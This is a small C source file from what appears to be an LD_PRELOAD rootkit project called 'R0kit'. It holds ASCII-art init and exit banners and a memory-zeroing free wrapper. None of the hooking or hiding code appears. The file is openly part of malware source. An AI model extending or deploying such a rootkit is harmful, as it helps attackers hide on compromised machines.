#include "../includes/global.h"
#include "../includes/prototypes.h"

void r0kit_init(void)
{
    DEBUG("\n"
    "  __________________________________________  \n"
    "//                                          \\\n"
    "| .:::::::                .::          .::   |\n"
    "| .::    .::      .::     .::      .:  .::   |\n"
    "| .::    .::    .::  .::  .::  .::   .:.: .: |\n"
    "| .: .::      .:: ... .:: .:: .:: .::  .::   |\n"
    "| .::  .::    .::  ... .::.:.::   .::  .::   |\n"
    "| .::    .::   .::    .:: .:: .:: .::  .::   |\n"
    "| .::      .::   .:::     .::  .::.::   .::  |\n"
    "\\__________________________________________//\n"
    "|                                            |\n"
    "|  LD_Preload R0kit rootkit (vers: 0.9-beta  |\n"
    "\\__________________________________________//\n"
    " = Logging Output =-------------------------= \n"
    "    ooooooooooo                               \n"
    "     o ooooo o                                \n"
    "      o ooo o                                 \n"
    "       o o o                                  \n"
    "        o o                                   \n"
    "         o                                    \n\n");
}

void r0kit_exit(void)
{
    DEBUG("\n"
    "\\ __________________________________________ /\n"
    "//                                          \\\n"
    "|    .::::::::.::      .::.::.::: .::::::    |\n"
    "|    .::       .::   .::  .::     .::        |\n"
    "|    .::        .:: .::   .::     .::        |\n"
    "|    .::::::      .::     .::     .::        |\n"
    "|    .::        .:: .::   .::     .::        |\n"
    "|    .::       .::   .::  .::     .::        |\n"
    "|    .::::::::.::      .::.::     .::        |\n"
    "\\__________________________________________//\n\n");
}

void r0kit_free(void *var, int len)
{
    DEBUG(" # free called on %p\n", var);
    memset(var, 0, len);
    free(var);
}
